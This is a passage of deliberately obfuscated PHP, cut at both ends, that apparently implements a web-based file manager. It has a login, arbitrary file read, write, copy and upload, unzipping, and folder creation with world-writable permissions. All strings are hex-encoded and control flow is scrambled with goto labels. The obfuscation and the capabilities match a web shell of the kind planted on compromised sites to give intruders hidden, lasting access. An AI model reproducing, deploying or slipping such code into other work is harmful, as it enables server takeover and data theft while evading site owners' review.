65\50\57\x2e\x2a\x5c\x2f\x2f\54\x20\x27\47\x29\73\xd\xa\11\11\x9\x9\x9\x9\151\x6e\160\x75\x74\x2e\x74\x72\x69\147\x67\145\162\50\x27\x66\151\x6c\145\163\145\154\145\143\164\47\x2c\40\x5b\156\165\x6d\x46\151\x6c\x65\163\x2c\x20\x6c\141\142\x65\154\135\x29\73\xd\12\x9\11\11\11\11\11\x76\x61\162\x20\x54\163\x69\172\145\75\60\73\xd\12\x9\11\x9\x9\11\x9\166\141\162\x20\x54\x6c\141\142\145\154\75\47\x27\73\15\xa\11\x9\11\11\11\11\146\157\162\x20\50\151\40\x3d\x20\x30\x3b\x20\151\x20\74\40\x6e\x75\155\106\151\x6c\x65\x73\x3b\x20\151\53\53\x29\40\x7b\xd\12\x20\x20\x20\40\40\40\40\40\40\x20\40\x20\40\40\40\40\40\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\x54\x73\151\172\x65\40\40\x3d\x20\x54\x73\x69\x7a\x65\53\40\164\150\x69\163\x2e\146\x69\x6c\x65\163\133\x69\135\x2e\x73\151\x7a\x65\x3b\15\xa\x9\11\x9\11\x9\11\x9\40\x54\154\x61\142\145\x6c\x20\75\x20\124\x6c\x61\x62\x65\x6c\x2b\x27\x2c\47\53\x74\x68\x69\163\x2e\x66\151\x6c\145\x73\x5b\x69\135\x2e\x6e\141\x6d\145\73\xd\xa\11\x9\11\x9\x9\x9\11\40\175\15\12\x9\x9\11\11\x9\x9\x9\x2f\57\x20\141\154\145\162\164\50\124\x6c\141\142\145\x6c\x29\x3b\xd\xa\xd\xa\x9\x9\11\11\x9\11\44\x28\x22\x23\x55\160\154\x6f\x61\144\106\151\154\x65\123\x69\x7a\145\x22\51\x2e\150\164\155\x6c\50\146\157\162\x6d\141\x74\x46\151\x6c\x65\x53\151\172\x65\50\x54\x73\x69\x7a\145\x29\x29\73\11\40\15\xa\11\11\x9\x9\11\x9\xd\12\11\11\x9\x9\11\11\151\146\x28\x6e\165\155\x46\151\154\x65\163\x3d\75\x30\51\x9\x9\15\12\11\x9\x9\11\x9\x9\x9\44\50\x22\x23\x46\151\154\145\x55\160\154\157\x61\x64\102\164\156\x22\x29\56\x61\164\x74\x72\50\x22\144\x69\163\141\x62\x6c\145\x64\x22\54\x20\42\144\x69\163\141\142\x6c\x65\144\x22\x29\73\15\12\x9\x9\11\x9\11\x9\x65\x6c\163\x65\15\12\x9\11\11\11\x9\11\x9\44\x28\x22\43\106\x69\x6c\x65\125\160\154\157\141\x64\102\x74\156\42\51\56\x72\x65\x6d\157\x76\x65\x41\164\x74\x72\x28\42\x64\151\163\141\x62\x6c\x65\144\x22\x29\73\15\12\x9\11\11\11\x9\11\xd\xa\11\11\11\x9\x9\11\xd\xa\11\x9\x9\x9\x9\11\xd\12\x9\x9\11\x9\11\x9\x69\x66\50\x6e\x75\155\106\x69\x6c\x65\x73\76\61\x29\11\x9\11\x9\15\12\x9\x9\x9\x9\11\x9\40\x20\x24\50\x27\43\151\x6e\160\x75\x74\x46\151\x6c\145\x55\x70\154\x6f\x61\x64\47\51\56\166\x61\154\50\47"; goto PHKQY; iPxks: unset($XMJqR); goto zWb09; OWf_R: echo "\47\54\15\xa\x9\x9\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\160\162\x65\166\40\72\40\x27\302\xab\47\54\15\12\11\11\x20\x20\40\x20\x20\x20\40\40\40\x20\40\40\x6e\x65\x78\164\40\72\x20\47\302\xbb\x27\x2c\xd\12\x9\x9\40\x20\40\40\x20\40\40\40\x20\x20\x20\x20\154\x61\163\164\x20\x3a\40\47"; goto Ia0B5; sJbql: Dllt3: goto nww7S; pSZ84: echo $W7YOX[30]; goto ZDycd; xV2No: LpfO9: goto UBauP; GjHP2: $Ru0H7 = ceil($PEjj0 / $TdtK7); goto fDLzy; MEF7q: fvb8T: goto AKt8a; Bz5J5: $PEjj0 = $x6_fq["\143\157\165\156\164"]; goto Q5vw_; SryOC: echo $fZ6Lt[2]; goto W7jei; sNQps: echo "\x22\40\x6e\141\x6d\x65\x3d\x22\x71\42\76\15\xa\x9\11\11\74\x69\x6e\x70\165\x74\x20\x74\171\x70\145\x3d\42\150\151\144\144\145\x6e\x22\40\x76\141\154\x75\145\x3d\42"; goto MtBsp; CTz_H: echo "\342\x86\220"; goto SY9lj; fk5_B: echo "\74\x2f\x62\x75\x74\164\x6f\156\76\40\xd\12\x20\40\x20\x20\x20\40\x20\x20\x3c\x62\165\164\x74\x6f\x6e\40\164\171\160\145\75\x22\x62\x75\164\x74\157\x6e\42\x20\143\154\x61\x73\163\x3d\x22\142\164\x6e\x20\x62\x74\x6e\x2d\x64\145\x66\x61\x75\154\x74\x22\40\144\141\164\x61\55\x64\x69\x73\155\151\163\x73\75\42\155\x6f\144\141\x6c\42\76"; goto T7cuW; W2G80: echo "\42\76\x20\x20\40\40\40\x20\40\15\12\40\x3c\154\151\x20\x63\x6c\141\x73\x73\x3d\42\x64\x72\x6f\160\x64\x6f\x77\156\x22\76\xd\xa\x20\x20\40\x20\74\x61\40\x68\162\145\146\75\x22\x23\42\40\143\x6c\x61\x73\163\75\x22\144\162\157\160\144\157\167\156\x2d\x74\157\x67\147\154\x65\x22\40\x64\x61\x74\141\x2d\164\x6f\147\147\154\145\75\42\144\162\157\160\x64\x6f\x77\156\42\76\15\xa\x20\x20\40\x20\40\40\x20\x3c\163\x70\x61\x6e\40\143\x6c\141\163\163\x3d\42\125\163\x65\x72\x49\143\157\156\x22\x3e\x3c\57\x73\x70\141\x6e\x3e\x20"; goto WtVDq; CMvAo: goto Tp6iE; goto vhaII; sOayt: goto bx5JM; goto WT7Iy; CgDq9: echo "\51\40\156\x6f\x2d\162\x65\x70\145\x61\164\x20\x6c\x65\146\x74\x20\x63\x65\156\x74\x65\162\73\x70\x61\x64\144\x69\156\x67\72\x20\x35\160\x78\x20\60\40\x35\x70\170\40\62\65\x70\170\x3b\155\141\x72\147\151\156\55\154\145\146\x74\72\40\65\x70\x78\x3b\x7d\15\xa\56\123\x68\157\x77\x49\143\157\156\x20\173\x62\141\143\x6b\x67\162\x6f\165\156\x64\x3a\165\x72\154\50"; goto rtNRt; GR0xY: $W7YOX[7] = "\x45\170\x74\x65\156\x73\x69\157\x6e"; goto w8PlE; uVMXr: ZeAoh: goto J1E9G; xrzq8: $X_irx = "\141\x64\155\151\156"; goto jj4cC; ZVUJP: if (!isset($_GET["\143\157\x70\x79"])) { goto c2jen; } goto Ea8fY; cdeN4: if (in_array(q6L_E($_GET["\x72\x65\x61\144"]), $r2sBB[1]) || count($r2sBB[1]) == 0) { goto uqZT3; } goto Dq1Rg; eNDgN: O8ZCS: goto CTz_H; OIB6x: if (in_array(Q6l_e($_POST["\x77\162\x69\x74\x65"]), $r2sBB[1]) || count($r2sBB[1]) == 0) { goto UGn4Q; } goto AKvwv; KGnDW: exit(header("\114\157\143\141\164\151\157\156\72\40" . $_SERVER["\120\110\x50\x5f\x53\105\114\x46"])); goto fx10_; eaeA7: if (in_array($_GET["\163\x65\141\162\x63\x68"], $x6_fq["\154\151\163\164"])) { goto iRi03; } goto toGpe; D9ZEf: ini_set("\x64\x69\163\160\x6c\x61\x79\x5f\145\x72\162\157\x72\163", 1); goto DbUR9; NC6j_: echo $fZ6Lt[7]; goto CgDq9; Fdge4: echo $W7YOX[33]; goto GkDcH; T_Fco: echo "\x3c\57\x61\76\74\x2f\x6c\x69\76\15\12\40\40\40\x20\40\x20\40\40\74\57\165\154\x3e\xd\xa\xd\xa\40\40\x20\x20\x20\x20\40\x20\74\144\151\166\x20\143\x6c\141\x73\x73\75\42\x74\x61\x62\55\143\157\156\x74\145\x6e\x74\x22\76\xd\xa\x9\x9\x9\xd\12\x20\40\40\40\40\40\40\40\40\40\x20\40\x3c\144\x69\166\40\151\144\75\x22\x5f\142\x72\x6f\x77\163\x65\42\x20\143\x6c\141\163\163\x3d\x22\164\x61\142\55\160\141\156\145\x20\x66\x61\144\x65\x20\x69\x6e\x20\141\x63\x74\151\166\x65\42\x3e\xd\12\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x3c\144\x69\166\40\x69\144\x3d\42\x52\145\x73\165\154\x74\x22\x20\x63\x6c\x61\x73\163\x3d\42\172\x6f\156\145\x22\40\76\40\x3c\x2f\144\x69\166\x3e\15\12\40\40\40\40\40\40\x20\x20\40\40\40\x20\x3c\57\144\x69\x76\76\xd\12\x9\11\11\x20\xd\12\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x3c\144\x69\166\40\151\144\x3d\x22\x5f\164\x72\x65\x65\42\x20\x63\154\x61\163\x73\x3d\42\164\x61\x62\x2d\x70\141\x6e\x65\40\146\x61\x64\145\x22\76\xd\12\x9\x9\x9\40\40\x20\40\x3c\x62\x72\x3e\15\12\40\40\40\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\40\74\165\x6c\x20\x63\154\141\x73\163\x3d\42\164\162\x65\x65\x76\151\145\x77\42\40\x69\144\x3d\x22\154\x69\163\164\x46\x6f\154\144\145\x72\106\151\154\x65\163\42\76\x20\xd\12\x9\11\x9\11\74\x2f\165\154\76\xd\12\11\x9\x9\x3c\x2f\144\151\x76\76\15\xa\40\x20\x20\x20\40\40\x20\40\x3c\57\x64\x69\166\76\xd\xa\11\x9\xd\12\40\x20\40\x20\40\x20\x20\x20\74\x2f\144\151\x76\x3e\xd\xa\x20\40\x20\x20\40\x20\40\x20\74\144\x69\166\x20\143\154\141\x73\x73\75\42\155\x6f\144\141\154\55\x66\x6f\157\164\x65\162\42\x3e\xd\xa\x9\11\x20\x20\74\x73\160\141\x6e\x20\x69\x64\x3d\x22\x46\151\154\145\x57\162\151\164\145\x4c\141\142\145\154\163\x75\143\x63\145\x73\x73\x22\x20\x63\x6c\141\x73\x73\x3d\x22\154\x61\142\145\x6c\x20\x6c\141\x62\x65\x6c\55\163\x75\x63\x63\x65\x73\x73\40\x70\165\154\154\x2d"; goto cetl3; Dq1Rg: die($W7YOX[7]); goto Oo9UZ; ZFriU: echo "\x29\x20\x6e\x6f\55\162\x65\160\x65\x61\x74\40\154\x65\x66\164\40\143\145\x6e\x74\145\x72\x3b\x70\141\144\x64\151\156\147\x3a\x20\x35\160\x78\x20\60\40\65\160\x78\40\x32\65\160\170\x3b\155\141\162\147\x69\x6e\x2d\154\145\146\164\x3a\40\65\x70\170\73\175\xd\xa\56\125\160\x6c\x6f\141\144\x49\143\157\156\x7b\142\x61\x63\x6b\147\x72\157\165\156\x64\x3a\165\x72\154\x28\x20"; goto fKjGT; SY9lj: apuN2: goto IC8TL; EQ_72: echo $W7YOX[17]; goto zhyb8; toGpe: $BsWPo[0] = "\115\x61\164\x63\x68\x5f\x6e\157\164\x5f\x66\x6f\165\x6e\x64"; goto CMvAo; DL6g4: $EoW3a = true; goto uNzCl; X0vxt: echo "\x29\40\x6e\157\55\x72\x65\x70\x65\141\x74\x20\143\145\156\x74\x65\162\40\143\x65\x6e\164\145\x72\73\x20\x70\x61\x64\x64\151\x6e\x67\x3a\40\x32\x35\x70\170\x20\73\175\xd\12\x62\157\x64\171\40\173\x62\x61\143\x6b\147\162\x6f\x75\156\144\72\40\43\x46\61\106\x31\106\x31\40\156\157\x6e\145\x20\x72\x65\160\x65\141\164\40\163\143\x72\x6f\154\154\x20\60\x25\x20\x30\45\73\x6d\x61\162\x67\x69\x6e\55\x62\x6f\x74\x74\157\155\72\x32\x30\160\170\x3b\175\15\xa\x74\144\173\146\x6f\156\x74\55\163\x69\x7a\x65\x3a\40\61\62\x70\170\73\x7d\xd\12\x2e\x70\x61\x67\151\156\141\x74\151\x6f\x6e\40\x7b\40\155\x61\x72\x67\x69\x6e\x3a\x30\x70\x78\73\175\15\xa\x2e\164\x61\142\154\145\x2d\x66\151\170\145\144\40\173\40\x62\x6f\162\x64\x65\x72\x2d\x74\157\160\72\40\60\160\x78\40\73\175\15\12\x2e\x74\141\142\154\x65\55\x66\x69\x78\145\144\40\164\150\x65\141\144\x20\x7b\40\167\151\x64\164\150\x3a\x20\x39\x37\x25\73\x7d\xd\xa\x2e\164\141\x62\154\145\x2d\x66\151\170\x65\x64\40\164\x62\x6f\144\x79\x20\x7b\x68\145\151\x67\150\x74\72\40\x33\x30\x30\x70\170\73\x6f\x76\145\162\146\154\157\167\x2d\x79\x3a\40\x61\165\x74\157\73\x77\151\x64\x74\x68\72\40\x31\x30\60\45\73\175\15\xa\56\x74\x61\x62\154\x65\x2d\146\151\x78\145\144\40\x74\150\x65\141\144\x2c\40\x2e\164\141\142\154\145\55\x66\151\x78\x65\144\x20\164\142\x6f\144\171\x2c\40\x2e\164\x61\142\154\145\x2d\x66\x69\170\x65\144\x20\164\x72\54\x20\x2e\x74\x61\x62\154\x65\55\146\x69\x78\145\x64\x20\164\144\x2c\40\x2e\164\x61\142\154\145\55\146\x69\170\x65\144\x20\164\x68\x20\x7b\x64\151\x73\160\x6c\x61\x79\x3a\x20\x62\154\x6f\x63\153\x3b\x7d\xd\xa\x2e\164\141\142\154\145\55\146\x69\x78\x65\x64\x20\x74\x62\x6f\x64\x79\40\x74\x64\54\40\x2e\164\x61\x62\x6c\x65\55\146\151\170\145\144\x20\x74\x68\145\141\144\40\76\40\164\x72\x3e\x20\x74\x68\40\173\146\x6c\x6f\x61\164\x3a\40\154\145\x66\x74\x3b\x62\157\162\x64\145\162\x2d\x62\157\x74\x74\x6f\155\x2d\167\151\144\164\x68\x3a\x20\x31\160\x78\73\175\15\12\56\x62\164\156\x2d\x66\x69\154\x65\x20\173\x70\157\x73\x69\164\151\157\156\72\x20\x72\145\x6c\141\164\151\x76\x65\73\157\x76\145\162\x66\154\157\x77\72\40\x68\x69\x64\x64\x65\156\73\x7d\15\xa\56\142\164\156\55\x66\x69\x6c\145\40\151\x6e\160\x75\164\133\x74\x79\x70\x65\75\146\x69\x6c\145\135\40\x7b\x70\x6f\163\151\164\x69\157\156\72\40\141\142\163\157\154\165\x74\145\73\164\157\160\x3a\x20\x30\73\x72\x69\x67\x68\164\72\x20\60\x3b\155\x69\x6e\x2d\x77\151\144\x74\150\x3a\x20\61\60\60\x25\73\x6d\x69\156\x2d\150\x65\151\147\150\x74\x3a\40\61\60\60\x25\x3b\146\x6f\156\x74\x2d\163\151\x7a\x65\x3a\40\61\x30\x30\x70\170\73\x74\145\x78\164\55\x61\154\x69\147\x6e\72\x20\162\151\x67\x68\x74\x3b\146\x69\x6c\164\x65\162\x3a\x20\141\154\x70\x68\x61\50\x6f\160\141\x63\151\164\171\x3d\x30\x29\x3b\157\160\141\143\x69\164\171\72\x20\60\73\x6f\x75\x74\x6c\151\x6e\145\72\x20\156\x6f\156\x65\x3b\x20\x62\141\x63\x6b\147\x72\157\x75\156\144\72\x20\x77\150\x69\x74\x65\73\x63\x75\x72\x73\157\162\x3a\40\x69\156\x68\145\x72\151\x74\73\x64\x69\163\160\x6c\141\x79\x3a\x20\142\x6c\157\143\x6b\x3b\175\xd\xa\56\156\141\166\142\x61\x72\x2d\x62\162\141\156\x64\40\173\146\157\156\164\55\x73\x69\x7a\x65\x3a\x20\61\x34\x70\170\73\x7d\xd\xa\xd\12\x2e\x74\162\x65\145\166\151\145\x77\x2c\x20\56\x74\162\145\x65\x76\x69\x65\167\40\x75\x6c\40\x7b\x6d\x61\162\147\x69\156\x3a\x30\x3b\x70\x61\144\144\x69\156\x67\x3a\60\73\x6c\151\163\x74\55\x73\x74\171\154\x65\x3a\156\x6f\156\x65\x3b\x63\x6f\154\157\162\72\40\43\104\70\104\x38\104\x38\x3b\175\xd\12\56\x74\162\145\x65\166\151\145\167\40\x75\154\40\173\40\155\141\162\x67\x69\156\x2d\x6c\x65\146\x74\72\61\145\x6d\x3b\160\157\163\151\164\151\x6f\156\x3a\x72\145\154\x61\164\151\166\x65\x7d\15\12\56\x74\x72\x65\145\x76\151\145\167\40\x75\154\x20\x75\x6c\40\173\155\141\x72\147\x69\x6e\x2d\x6c\145\146\164\x3a\x2e\x35\x65\155\x7d\15\xa\xd\12\x2e\x74\162\145\x65\166\151\145\167\40\x6c\x69\x20\173\x6d\x61\x72\x67\151\156\72\x30\73\160\x61\x64\x64\151\x6e\x67\x3a\x30\40\61\x65\x6d\73\x6c\151\156\x65\x2d\150\145\151\x67\x68\x74\x3a\62\x65\x6d\73\160\x6f\163\151\x74\x69\157\x6e\x3a\x72\145\154\141\x74\x69\166\x65\x7d\15\xa"; goto cpdAB; qN9v6: $nY7pD .= "\x3c\164\x68\x20\143\x6c\141\x73\163\x3d\42\150\x69\144\144\x65\x6e\x2d\x78\163\x20\x63\x6f\154\55\155\144\55\62\42\x3e" . $W7YOX[8] . "\x3c\57\x74\150\76\x3c\57\164\162\76\74\57\164\150\x65\141\x64\76\x3c\x74\x62\157\144\171\76"; goto NxfcO; H1h9r: $W7YOX[16] = "\x46\157\154\x64\145\x72"; goto xdaMh; KYVvW: gtOWN: goto GjHP2; dg791: unset($og4n9); goto QIIfi; T7cuW: echo $W7YOX[15]; goto aeydW; Tkd8f: hZI9r(); goto ND4cY; sduOA: unset($_GET); goto kMAz1; hluHo: $W7YOX[42] = "\x49\x6e\x66\157\162\155\x61\x74\x69\157\156"; goto VrA3S; I4D4x: hZI9R(); goto W2G80; Q2XUz: echo $W7YOX[35]; goto ynK_u; hGfgt: if (!(isset($_POST["\x75\x73\145\x72\x6e\x61\155\x65"]) && isset($_POST["\x70\141\x73\x73\167\x6f\162\144"]))) { goto oIsqU; } goto VLmmI; KWey8: echo "\47" . implode("\47\x2c\47", $r2sBB[1]) . "\x27"; goto q0jup; WT7Iy: D1Ou4: goto iXEXG; kjo__: echo $fZ6Lt[5]; goto lw7aJ; clANY: echo $W7YOX[14]; goto Ymtme; bdvcQ: if (!($aBuS5 != '')) { goto ZzBxY; } goto Alqx4; Qljlm: WyrFE: goto mIsyL; UXXm6: XTEPS: goto eTdmR; X_cRI: echo "\x29\40\x6e\157\x2d\x72\x65\160\145\141\x74\40\x6c\x65\146\164\x20\x63\145\156\164\x65\x72\x3b\40\160\x61\x64\x64\x69\156\147\72\40\65\x70\x78\x20\60\40\65\160\170\40\x32\x35\160\170\x3b\x6d\x61\x72\147\151\x6e\x2d\x6c\145\x66\x74\72\x20\x35\x70\x78\x3b\x7d\xd\12\x2e\x49\155\x61\147\145\111\143\157\x6e\x20\x7b\x62\x61\143\x6b\147\162\157\165\156\x64\x3a\165\x72\154\x28"; goto YAgyE; XWrNb: $W7YOX[41] = "\125\x6e\132\151\x70\x20\146\x69\x6c\x65"; goto hluHo; rQmfA: $r2sBB[2] = array("\147\x69\x66", "\x6a\x70\x67", "\152\160\x65\x67", "\x70\x6e\147", "\x62\x6d\160", "\151\x63\157", "\164\151\x66\x66", "\163\166\x67"); goto gDTXf; KxkGT: @mkdir($Lfznb . "\57" . $_GET["\156\x65\x77\146\x6f\x6c\144\145\x72"], 0777, true); goto zSvwq; MtI8Y: $fZ6Lt[1] = "\x64\141\x74\141\72\151\155\141\147\x65\x2f\160\156\147\73\142\x61\163\145\66\64\x2c\151\126\x42\117\x52\167\x30\113\107\147\157\x41\101\101\x41\x4e\x53\125\x68\x45\125\x67\x41\101\101\102\101\101\101\x41\x41\121\103\101\x59\101\101\101\x41\146\x38\x2f\x39\x68\101\101\101\x41\170\153\x6c\105\x51\126\x51\64\152\x61\x33\x52\115\121\66\x43\x51\x42\x41\x46\125\x42\x49\x37\157\61\x5a\141\62\x56\x68\141\x47\162\167\101\x38\121\104\x65\x78\x4a\x59\x43\x6d\151\153\111\112\111\124\x6b\172\71\x2f\x51\125\x4e\x74\170\x43\152\x75\120\x59\117\111\x35\152\x4a\61\x69\x67\x77\60\x52\x5a\101\155\x54\124\x44\x4f\x37\x65\146\155\172\x36\x7a\x68\x6a\x6c\x6f\x67\x73\126\124\x55\101\111\115\x32\x4f\157\155\x6a\x39\106\61\x44\x56\167\120\146\x39\x65\x58\x4d\x4f\x51\x45\147\53\122\107\x54\x57\103\x51\x43\x51\164\156\x6d\x64\67\154\141\x57\65\x57\x51\111\105\111\x72\x49\x49\163\165\x79\162\141\x71\145\162\x59\x45\x34\x6a\154\143\x41\x77\x6e\x71\x56\151\x7a\130\121\53\x38\x35\x6f\x77\x4b\x39\166\162\116\166\x72\104\132\x44\x63\x41\x33\x43\x62\65\x7a\x59\x4a\63\x44\x52\116\144\x30\x56\122\x54\x41\106\64\x51\x34\102\104\x6b\151\121\x62\x6b\x6c\144\126\x66\x51\115\64\71\121\x5a\x49\63\157\x30\170\106\x63\x6d\130\115\141\x62\x36\164\155\60\103\x2b\x30\x64\x55\61\123\120\112\x76\x41\115\x51\x6b\x73\x39\127\x59\x45\150\71\101\x50\106\x53\170\x61\x6e\121\x52\62\x51\111\x41\x41\x41\x41\x41\x45\x6c\106\x54\x6b\123\165\x51\155\x43\103"; goto bOhct; CYnwZ: $fZ6Lt[13] = "\144\x61\x74\x61\x3a\x69\155\141\147\145\x2f\x70\x6e\x67\x3b\x62\141\163\145\66\x34\54\151\126\x42\117\122\x77\x30\113\107\x67\x6f\101\x41\x41\x41\116\123\x55\x68\x45\x55\147\x41\x41\101\x42\x41\101\x41\x41\101\121\x43\101\x59\x41\x41\x41\101\146\70\x2f\x39\150\101\101\x41\x41\x58\125\154\105\x51\x56\x51\64\x6a\127\x4e\x67\107\x4a\x62\101\153\x34\x47\102\111\121\121\120\71\161\x58\125\x67\150\103\x61\107\53\104\115\x77\115\x44\x41\122\141\64\x42\x7a\x67\x77\115\x44\x45\x59\115\104\101\167\163\x53\112\151\x52\x46\101\115\x36\x47\x52\x67\131\x59\x68\x6b\131\107\x41\113\121\x73\102\x77\160\x42\152\x41\170\115\x44\x43\153\115\x44\101\x77\x63\x4f\x4e\122\x51\x7a\x41\x4d\155\x4b\103\131\142\101\x4d\x49\101\131\111\x47\105\105\x70\111\127\132\x53\x36\x59\112\101\x42\101\105\x77\113\103\x37\160\113\x75\x59\124\x45\x41\x41\x41\x41\101\105\154\106\124\x6b\123\165\121\x6d\x43\103"; goto pI2Ut; t47Jt: unset($_SESSION); goto ZFPL_; ZoxKH: session_destroy(); goto GhYp3; cZTDT: if ($Q9vLm == '') { goto m05f7; } goto EyoRY; KMMvP: $fZ6Lt[9] = "\x64\141\x74\141\x3a\x69\155\141\x67\145\x2f\160\x6e\147\x3b\x62\141\163\145\x36\64\x2c\151\x56\x42\117\x52\167\x30\113\x47\x67\x6f\x41\x41\101\101\x4e\123\x55\150\x45\125\x67\x41\x41\x41\x42\101\101\x41\x41\x41\121\x43\x41\x59\x41\101\101\x41\x66\x38\57\x39\150\101\x41\x41\102\x44\125\x6c\105\x51\126\121\64\x6a\x64\x32\123\115\125\67\x44\121\x42\x42\106\x70\53\125\141\x63\101\103\113\x58\115\103\x4e\112\x59\x4c\103\103\x56\170\172\110\x44\x66\62\103\x66\x41\161\x56\144\141\172\x34\x30\62\x4e\151\x4a\113\60\127\x52\143\x55\165\125\x42\x41\x6c\101\105\142\x43\154\112\70\103\x75\114\x49\x63\x74\141\123\66\63\x78\160\x4e\x64\112\157\71\x50\146\x74\x37\x43\143\66\113\153\x31\124\153\105\145\106\164\x63\111\x69\x79\x49\62\x42\x5a\x73\x62\x72\x64\161\x74\x39\143\60\122\x45\111\61\x2b\x54\x52\144\102\x6f\x34\170\167\101\x49\x44\x66\x6d\63\x4b\123\x50\x67\x45\130\167\71\166\64\x42\x41\x46\151\165\x31\x74\147\x34\x42\170\142\170\x7a\156\x6f\112\152\x4c\130\131\x37\x7a\x2f\170\130\146\x2b\143\123\104\124\x7a\165\125\106\104\60\x4e\x51\153\123\122\x44\x48\x38\x61\x31\131\151\71\57\x44\x41\x56\x56\x64\64\x36\165\161\x41\x41\x41\172\x6e\x30\107\114\157\106\62\x76\132\104\65\110\x56\x37\x6e\x76\103\130\x30\67\x79\112\122\x36\x5a\150\106\x6f\132\x6d\150\155\x35\x43\x4c\x49\154\x48\x6f\x5a\x76\101\x4d\x69\165\150\x35\120\112\147\x39\102\x45\116\171\x46\131\x58\x68\x2f\156\114\163\x5a\x54\x43\104\x57\x36\151\x59\x48\114\101\x49\165\151\x70\x33\x33\x6d\x69\x69\113\x48\156\63\x39\144\x67\x35\143\x57\121\x49\101\x57\x47\x51\x32\155\113\x43\x62\x41\61\x65\127\106\x35\x75\104\x50\155\x58\x54\x36\x61\113\x62\147\171\x65\154\106\x6f\115\x4e\x36\x50\57\120\x52\65\x31\172\171\x73\105\x66\x32\x2f\x52\102\106\112\103\127\x4d\150\x73\101\x41\x41\101\x41\x53\125\126\x4f\122\113\x35\x43\131\x49\x49\x3d"; goto EC5rH; oLDGz: unset($BsWPo); goto FGMOT; mvEEN: unset($Q9vLm); goto RUHTJ; FxXco: unset($Q9vLm); goto CbJ16; Q62pA: $r2sBB[2] = array_map("\163\164\x72\164\x6f\154\x6f\167\x65\x72", $r2sBB[2]); goto Y2zZp; GhYp3: exit(header("\114\157\x63\141\164\151\157\156\72\40" . $_SERVER["\120\x48\120\x5f\123\x45\114\106"])); goto rCMmV; g1yRb: error_reporting(E_ALL); goto D9ZEf; tNSaw: echo "\40\x3c\x63\x6f\x64\x65\x20\151\x64\75\42\x69\155\x67\125\162\154\42\x3e\x3c\57\x63\x6f\144\x65\x3e\74\x2f\150\64\x3e\xd\12\x20\40\x20\40\x20\x20\x20\x20\x3c\57\x64\151\166\76\xd\12\40\x20\40\x20\x20\x20\40\x20\74\x64\151\166\40\x63\x6c\141\163\163\75\x22\x6d\157\144\141\x6c\x2d\142\x6f\x64\171\42\76\15\xa\x9\x9\40\x20\x3c\151\156\160\x75\164\40\x69\x64\75\42\146\x69\x6c\x65\156\x61\155\145\104\x69\x72\42\x20\164\171\160\145\x3d\x22\150\x69\144\x64\x65\x6e\x22\x20\76\11\xd\12\40\40\x20\40\40\40\x20\40\x20\x20\74\151\156\x70\165\164\40\164\x79\160\145\x3d\42\x68\151\x64\x64\145\x6e\x22\40\x69\144\x3d\42\146\x69\154\145\x6e\141\155\145\x49\156\160\x75\164\x22\76\15\12\40\40\40\x20\40\x20\40\40\40\x20\15\12\11\x9\40\40\xd\12\x9\x9\15\12\x9\x9\15\xa\11\x9\x3c\165\x6c\x20\x63\154\x61\x73\163\x3d\42\156\x61\166\x20\x6e\x61\x76\55\164\141\142\163\42\76\15\xa\x20\40\40\40\40\x20\40\x20\40\40\x20\40\74\x6c\151\40\143\154\141\163\163\x3d\42\141\143\164\x69\166\145\x22\x3e\74\x61\x20\x64\141\164\x61\55\x74\157\147\x67\154\x65\x3d\42\x74\x61\142\x22\x20\x68\x72\x65\x66\75\x22\43\137\x62\162\x6f\167\x73\x65\42\x20\151\144\75\42\x48\x72\145\x66\x42\x72\x6f\167\x73\145\42\76"; goto EsEun; czw94: function EKF2F($telKg, $f4vjY) { goto VLnOk; VLnOk: global $KjPGL; goto eZWsH; cWO_2: return $KjPGL[$telKg]; goto oMRoY; eZWsH: if (!($f4vjY == "\115\x61\164\143\x68\137\x6e\157\x74\x5f\146\157\165\156\x64")) { goto rFhIm; } goto lQJJD; J0deb: rFhIm: goto cWO_2; lQJJD: return "\x2d\55"; goto J0deb; oMRoY: } goto wcr3u; W7jei: echo "\51\x20\156\x6f\x2d\162\145\160\145\141\164\40\x6c\145\x66\x74\40\143\x65\156\164\145\x72\73\40\160\141\144\x64\x69\156\147\72\x20\65\x70\x78\40\x30\x20\65\160\170\x20\x32\x35\x70\170\73\155\141\162\147\x69\x6e\x2d\x6c\x65\x66\164\x3a\40\x35\x70\x78\x3b\x7d\x9\11\15\12\56\x43\106\x6f\154\x64\x65\x72\x49\143\x6f\x6e\x20\x7b\142\x61\143\153\x67\x72\157\x75\156\x64\x3a\x75\x72\154\x28"; goto Jxbaz; XcLZ6: unset($fZ6Lt); goto N6pww; LlzrK: if (!function_exists("\x73\143\x61\156\x64\151\162")) { function scandir($g7ThV, $aYU3b = 0) { goto Kc3Yx; egDn_: p3zTX: goto T02cX; jqgpQ: if (!($f4vjY != "\x2e" && $f4vjY != "\56\x2e")) { goto dL0rS; } goto qusfX; xSUxO: return false; goto hxOag; w30yA: return $BsWPo; goto Q638R; tsltD: BlLdr: goto w30yA; gIWZA: nYd4g: goto gFqqI; hxOag: goto XBL1j; goto egDn_; T02cX: $BsWPo = []; goto Z25ZZ; b967h: dL0rS: goto bMeWQ; Z25ZZ: if (!($Y55cI = opendir($g7ThV))) { goto BlLdr; } goto gaIbJ; Kc3Yx: if (is_dir($g7ThV)) { goto p3zTX; } goto xSUxO; QSD5N: if (!(($f4vjY = readdir($Y55cI)) !== false)) { goto nYd4g; } goto jqgpQ; Q638R: XBL1j: goto e6zsE; gaIbJ: qZTES: goto QSD5N; qusfX: $BsWPo[] = $f4vjY; goto b967h; gFqqI: closedir($Y55cI); goto W3cuS; bMeWQ: goto qZTES; goto gIWZA; W3cuS: $aYU3b == 0 ? asort($BsWPo) : rsort($BsWPo); goto tsltD; e6zsE: } } goto TSBgK; zpQMe: echo 